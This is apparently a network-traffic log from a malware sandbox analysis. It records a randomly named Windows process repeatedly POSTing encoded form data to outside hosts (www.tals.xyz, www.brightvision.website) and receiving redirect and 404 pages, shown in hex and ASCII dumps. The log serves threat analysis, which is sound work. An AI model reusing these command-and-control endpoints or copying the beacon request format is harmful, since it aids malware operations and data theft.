Session ID: 30 | Source IP: 192.168.2.5 | Source Port: 50007 | Destination IP: 13.248.169.48 | Destination Port: 80 | PID: 6576 | Process: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
Timestamp: Nov 20, 2024 21:11:06.092484951 CET | Bytes transferred: 639 | Direction: OUT
POST /k1td/ HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.tals.xyz
                                                            Origin: http://www.tals.xyz
                                                            Referer: http://www.tals.xyz/k1td/
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Data Ascii: sVC8z=lGkRzIOh6zQ2Q1nfGcKl/NNBIWOT+AdzXFh2AyNf0j7ehKXflPSGwZVsEcSkqv7tXcXqlqUHIuvwiPMeYk4WYVbiDAtuXj6NFEXYHjVdYd0M8NmpH2awZufcv0GKul2kxYSzNApwaBLErnsmgjEW2wUJ6Kl4D4O4Ou0AVP0qQ5x3JxLvp8C3w/23HbUmCweBV2fr7LqmOt5JVoYcev3dm+3FP45I


Session ID: 31 | Source IP: 192.168.2.5 | Source Port: 50008 | Destination IP: 13.248.169.48 | Destination Port: 80 | PID: 6576 | Process: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
Timestamp: Nov 20, 2024 21:11:08.749001026 CET | Bytes transferred: 1656 | Direction: OUT
POST /k1td/ HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 1242
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.tals.xyz
                                                            Origin: http://www.tals.xyz
                                                            Referer: http://www.tals.xyz/k1td/
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Data Ascii: sVC8z=lGkRzIOh6zQ2Q1nfGcKl/NNBIWOT+AdzXFh2AyNf0jjeh/bfksqGxZVsFcSpqv7KXcfulqZ6Irrwjp4eT3gWPFbiLgtrJT7QFEHcHgtdYd0M8LKpOHawbufTs0Ge4V2cxYK8NAtKayzEqH8miQsW0QUx7KlaD4LmOuoMVKgAQ7h3KVaw6vuBqOi6XZg9UEOyRHWc5qm0PfRmbYo4L+m175P+K+sX6siJ47/HgplFTX+rKwa+yqw2dPnzB7pBxd8dH10PPvIzQaNFEAo0soiDi19nEtSs5iM7yVMXXCF0E6peqLm0hijyfe1o2rx/QtyuxyglScyezur5pIi0Kn3JtYkZsT+C1kehZ9qAOpE3Lnb3/R3in6/cpB6q9BCZ8F+kWQAUmAIYf0S3P9qgyOfDn0MhoF81vsUjCtQQdZ/LeNKJeau2A2+6d7vV11ZVo/Yv9A6YwGF8NwxVDb6C69J75XU2ZPfm3OtQQxXpJ5ZsGgxIIAQmGIprfHz8yrwXCgpM84TYmjhavD7Kk5JdGBTUqav9XJfe+tW3ONryuXvinYA/LYsYdp94GP+SbHTmKOxErFsC9HuQewEIVoc/GR6yyiZ2DkXo2jFXT+yLrDbmjM8wzo+q9Zu2z9wPDwps7Ry3SEHafGGbhinfzkrAJJUasSSBpORuNAb3ej4PHrlAArbnbxkgwlKrp3YfDnnvBqI6d46J2y67iDzAZmSJQK4ZqJQ1Ay03lUTnGnyvSaFNNpNiXYlgFAp9V9Od+38y96IIOk5gNnxHmBMuWHHfdyI8yoQZvzYBHjCYXSlHW/QT2WOuQS/2/rj9xoRI76MRa6kg/Pgdeoa9GC9zSlIE+AYl3lrAUBXg6ZLigWf6aMVjFcus+par5BLqdjLly8Ze/TWznI0lJPfmVXd8QSK2/AawBIHZFd2TkgvkuogZ7lqJ8NM59lxxEIO0xTzaQ5UyQgvj1r3fxuN0l4IHxz0XJcp4zWTWVqsKCp7bsrvbrnLXzq3hw+ [TRUNCATED]


Session ID: 32 | Source IP: 192.168.2.5 | Source Port: 50009 | Destination IP: 13.248.169.48 | Destination Port: 80 | PID: 6576 | Process: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
Timestamp: Nov 20, 2024 21:11:11.403420925 CET | Bytes transferred: 365 | Direction: OUT
GET /k1td/?sVC8z=oEMxw+ab8QlEZmTmAbDEuuFmAVWx5xMHQHNpbkBMxCjDr7HlodnZgfFsQKGKkvz/XYzpvPMYep3+sZsYYHcCVG2YOA5cLjPPS3bUYxhUJeAm1ae/P1TsW9+p+FqZ3lrXmQ==&PPP=FHWL56 HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Connection: close
                                                            Host: www.tals.xyz
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Timestamp: Nov 20, 2024 21:11:12.554590940 CET | Bytes transferred: 404 | Direction: IN
HTTP/1.1 200 OK
                                                            Server: openresty
                                                            Date: Wed, 20 Nov 2024 20:11:12 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 264
                                                            Connection: close
                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?sVC8z=oEMxw+ab8QlEZmTmAbDEuuFmAVWx5xMHQHNpbkBMxCjDr7HlodnZgfFsQKGKkvz/XYzpvPMYep3+sZsYYHcCVG2YOA5cLjPPS3bUYxhUJeAm1ae/P1TsW9+p+FqZ3lrXmQ==&PPP=FHWL56"}</script></head></html>


Session ID: 33 | Source IP: 192.168.2.5 | Source Port: 50010 | Destination IP: 203.161.42.73 | Destination Port: 80 | PID: 6576 | Process: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
Timestamp: Nov 20, 2024 21:11:18.119831085 CET | Bytes transferred: 655 | Direction: OUT
POST /gn26/ HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 206
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.brightvision.website
                                                            Origin: http://www.brightvision.website
                                                            Referer: http://www.brightvision.website/gn26/
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Data Ascii: sVC8z=SiBzWWJ1sOT3Q1V8lKUS1GGjhpNdUv5cDFhLvNIudYjmRX8yGMYor25H0WrhJnq1Q8icVL2u6LgT4Iq5tTjzhcU2DFFMBa1VaLffL/Xe0mAUumuKt2P7RG4J/EqwPDP0Qp5gwJKTQxuAN8UJ+Sw5uqPbVYpfMDFcj9sEWt+rEGRZPVHFWzgSV8p9+WUgSEHm4mIZqeg=
Timestamp: Nov 20, 2024 21:11:19.344311953 CET | Bytes transferred: 1236 | Direction: IN
HTTP/1.1 404 Not Found
                                                            Date: Wed, 20 Nov 2024 20:11:19 GMT
                                                            Server: Apache
                                                            Content-Length: 16052
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                            Nov 20, 2024 21:11:19.344337940 CET1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                            Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                            Nov 20, 2024 21:11:19.344353914 CET1236INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                            Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                            Nov 20, 2024 21:11:19.344362974 CET1236INData Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                                                            Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                                                            Nov 20, 2024 21:11:19.344378948 CET896INData Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32
                                                            Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
                                                            Nov 20, 2024 21:11:19.344394922 CET | 1236 | IN | Data Raw: 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e 39 33 37 35 2c 31 32 34 2e 30 39 39 39 38 20
                                                            Data Ascii: /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.66653,18.58299 3.08
                                                            Nov 20, 2024 21:11:19.344531059 CET | 1236 | IN | Data Raw: 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e 38 32 36 36 38 2c 37 2e 34 32 34 34 37 20 32
                                                            Data Ascii: 943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.003429,37.18159 -3.0
                                                            Nov 20, 2024 21:11:19.344547033 CET | 448 | IN | Data Raw: 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                            Data Ascii: 54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.23266 c -5.440192,
                                                            Nov 20, 2024 21:11:19.344726086 CET | 1236 | IN | Data Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74
                                                            Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa
                                                            Nov 20, 2024 21:11:19.344876051 CET | 1236 | IN | Data Raw: 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65
                                                            Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5"
                                                            Nov 20, 2024 21:11:19.464287043 CET | 1236 | IN | Data Raw: 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31
                                                            Data Ascii: one;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567" d="m 321.74355,168.0687 c -1e-5,3.3913 -3.42414,11.26702 -8.73834,11.26702 -5.3142,0 -18.59463,27.24606


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            34 | 192.168.2.5 | 50011 | 203.161.42.73 | 80 | 6576 | C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 20, 2024 21:11:20.966727972 CET | 675 | OUT | POST /gn26/ HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.brightvision.website
                                                            Origin: http://www.brightvision.website
                                                            Referer: http://www.brightvision.website/gn26/
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Data Raw: 73 56 43 38 7a 3d 53 69 42 7a 57 57 4a 31 73 4f 54 33 52 55 6c 38 6a 72 55 53 39 47 47 67 39 35 4e 64 43 66 35 59 44 46 39 4c 76 49 70 70 64 71 33 6d 52 79 41 79 48 4e 59 6f 6f 32 35 48 37 32 72 6b 4e 6e 71 75 51 38 76 6a 56 4b 4b 75 36 50 77 54 34 4a 61 35 73 67 37 77 69 73 55 77 4d 6c 46 30 46 61 31 56 61 4c 66 66 4c 35 36 7a 30 6e 6f 55 75 57 2b 4b 73 58 4f 4a 59 6d 34 4b 34 45 71 77 4c 44 4f 39 51 70 34 46 77 49 57 71 51 33 71 41 4e 34 45 4a 2b 6a 77 36 68 71 4f 51 52 59 6f 49 4c 41 68 58 6b 4e 59 75 57 50 37 69 45 6b 6c 48 44 44 32 76 4d 52 6f 36 47 63 46 46 75 46 63 58 44 30 6d 50 69 46 59 70 30 4a 32 34 71 47 6e 4a 32 33 47 6d 54 61 67 6d 72 33 47 6a 6e 4f 58 58
                                                            Data Ascii: sVC8z=SiBzWWJ1sOT3RUl8jrUS9GGg95NdCf5YDF9LvIppdq3mRyAyHNYoo25H72rkNnquQ8vjVKKu6PwT4Ja5sg7wisUwMlF0Fa1VaLffL56z0noUuW+KsXOJYm4K4EqwLDO9Qp4FwIWqQ3qAN4EJ+jw6hqOQRYoILAhXkNYuWP7iEklHDD2vMRo6GcFFuFcXD0mPiFYp0J24qGnJ23GmTagmr3GjnOXX
                                                            Nov 20, 2024 21:11:22.231471062 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                            Date: Wed, 20 Nov 2024 20:11:22 GMT
                                                            Server: Apache
                                                            Content-Length: 16052
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                            Nov 20, 2024 21:11:22.231486082 CET | 1236 | IN | Data Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                            Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                            Nov 20, 2024 21:11:22.231496096 CET | 1236 | IN | Data Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                            Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                            Nov 20, 2024 21:11:22.231504917 CET | 1236 | IN | Data Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                                                            Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                                                            Nov 20, 2024 21:11:22.231515884 CET | 1236 | IN | Data Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32
                                                            Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
                                                            Nov 20, 2024 21:11:22.231527090 CET | 1236 | IN | Data Raw: 35 31 2c 31 2e 35 32 31 36 35 20 30 2e 32 32 32 39 39 2c 31 2e 30 36 35 37 39 20 30 2e 31 34 39 33 33 2c 30 2e 36 30 39 31 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c
                                                            Data Ascii: 51,1.52165 0.22299,1.06579 0.14933,0.60912" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4533" d=
                                                            Nov 20, 2024 21:11:22.231538057 CET | 1236 | IN | Data Raw: 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20
                                                            Data Ascii: ke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4541" d="m 85.206367,122.98266 c 0.117841,11.74369 0.235693,23.48835 0.235693,36.55072 -10e-7,13.06238 -0.117833,27.43796 -0.05891,45
                                                            Nov 20, 2024 21:11:22.231548071 CET | 1236 | IN | Data Raw: 2c 32 36 2e 37 30 30 33 33 20 2d 32 2e 32 39 38 33 39 34 2c 36 2e 39 35 33 36 32 20 2d 32 2e 32 39 38 33 39 34 2c 31 31 2e 35 34 39 32 32 20 2d 31 2e 33 35 35 34 31 39 2c 32 34 2e 35 37 34 31 35 20 30 2e 39 34 32 39 37 34 2c 31 33 2e 30 32 34 39
                                                            Data Ascii: ,26.70033 -2.298394,6.95362 -2.298394,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-w
                                                            Nov 20, 2024 21:11:22.231559038 CET | 1236 | IN | Data Raw: 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 31 33 32 2e 36 38 37 35 2c 32 36 33 2e 33
                                                            Data Ascii: 1;" /> <path id="path4529" d="m 132.6875,263.34998 c -4.2289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-
                                                            Nov 20, 2024 21:11:22.231569052 CET | 1236 | IN | Data Raw: 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f 6e 7a 65 72 6f 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 30 30 31 35 37 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72
                                                            Data Ascii: ll-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567"
                                                            Nov 20, 2024 21:11:22.351572037 CET | 1236 | IN | Data Raw: 2c 30 2e 31 31 38 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65
                                                            Data Ascii: ,0.1183" style="fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4578-1"


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            35 | 192.168.2.5 | 50012 | 203.161.42.73 | 80 | 6576 | C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 20, 2024 21:11:23.625160933 CET | 1692 | OUT | POST /gn26/ HTTP/1.1
                                                            Accept: */*
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 1242
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Host: www.brightvision.website
                                                            Origin: http://www.brightvision.website
                                                            Referer: http://www.brightvision.website/gn26/
                                                            User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                            Data Raw: 73 56 43 38 7a 3d 53 69 42 7a 57 57 4a 31 73 4f 54 33 52 55 6c 38 6a 72 55 53 39 47 47 67 39 35 4e 64 43 66 35 59 44 46 39 4c 76 49 70 70 64 71 50 6d 51 41 34 79 47 75 67 6f 70 32 35 48 79 57 72 6c 4e 6e 72 73 51 34 4c 6e 56 4b 47 2b 36 4e 34 54 34 72 43 35 34 42 37 77 35 63 55 77 4a 56 46 50 42 61 31 36 61 4c 50 62 4c 35 4b 7a 30 6e 6f 55 75 54 36 4b 38 32 4f 4a 55 47 34 4a 2f 45 71 30 50 44 4f 52 51 6f 63 7a 77 49 53 6c 51 6e 4b 41 4e 5a 6f 4a 38 78 49 36 73 71 4f 53 57 59 6f 41 4c 41 63 50 6b 4e 30 49 57 4f 50 49 45 6e 31 48 41 47 48 48 55 68 34 6b 55 4f 56 6d 6d 43 45 52 65 67 36 79 6b 54 55 48 31 6f 36 35 74 46 54 71 77 7a 71 69 62 37 6b 71 77 67 57 57 6c 72 44 66 37 65 52 30 36 56 6a 31 77 35 4f 58 38 4b 63 49 6b 62 64 49 69 39 2b 48 4d 6c 69 62 4f 44 46 54 2f 53 69 49 71 36 61 71 4d 55 51 42 68 79 42 35 6f 4a 4a 61 54 61 5a 61 66 4e 63 59 7a 2b 33 44 54 62 39 79 38 66 32 6f 79 49 61 2f 69 78 46 31 4c 4b 54 51 63 35 4c 36 6e 70 32 65 64 57 55 35 66 30 